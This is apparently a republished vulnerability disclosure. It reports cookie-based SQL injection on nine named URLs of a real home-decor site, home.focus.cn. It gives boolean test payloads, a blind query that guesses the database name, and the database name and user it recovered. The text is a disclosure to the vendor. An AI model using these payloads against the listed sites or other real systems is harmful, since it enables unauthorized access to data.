网站地图    收藏   

主页 > 后端 > 网站安全 >

搜狐焦点家居多处Cookie注入打包 - 网站安全 - 自

来源:自学PHP网    时间:2015-04-16 23:15 作者: 阅读:

[导读] 下述url均存在cookie注入,厂商请注意修复。1 http: home focus cn newscenter newscenter php?subject_id=33show_citynum=5497558138882 http: home focus cn jiancaicheng index php?city_id=393 ht...

下述url均存在cookie注入,厂商请注意修复。

1. http://home.focus.cn/newscenter/newscenter.php?subject_id=33&show_citynum=549755813888

2. http://home.focus.cn/jiancaicheng/index.php?city_id=39

3. http://home.focus.cn/elite/article_index.php?group_id=2513&class_id=857

4. http://home.focus.cn/group/class_photos_more.php?type=pic&class_id=18

5. http://home.focus.cn/msglist/1703/?chkusr_id=11179/

6. http://home.focus.cn/group/photo.php?group_id=1702

7. http://home.focus.cn/group/photoshow.php?photo_id=4160673&group_id=1702

8. http://home.focus.cn/life/news_week.php?days=7&category_id=2

9. http://home.focus.cn/life/newscenter.php?subject_id=9

以第2个url补图说明:

漏洞url:http://home.focus.cn/jiancaicheng/index.php?city_id=39

存在cookie注入的变量:city_id=39

测试payload(放到Cookie中)

1. city_id=39 anD 1=1正常页面

 

2. city_id=39 anD 1=11返回不一样

\

猜解数据库名语句:city_id=39 anD (select ascii(substr(database(),1,1)))>100

猜解过程省略,结果如下:

注入类型: 数字型

数据库类型: MySQL

数据库名: home

用户名: readonly@10.xx.xx.x

其余几处的注射方法同上述案例。

 

漏洞修复方法:请检查并修复漏洞吧,免得黑客看到漏洞就想钻

 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论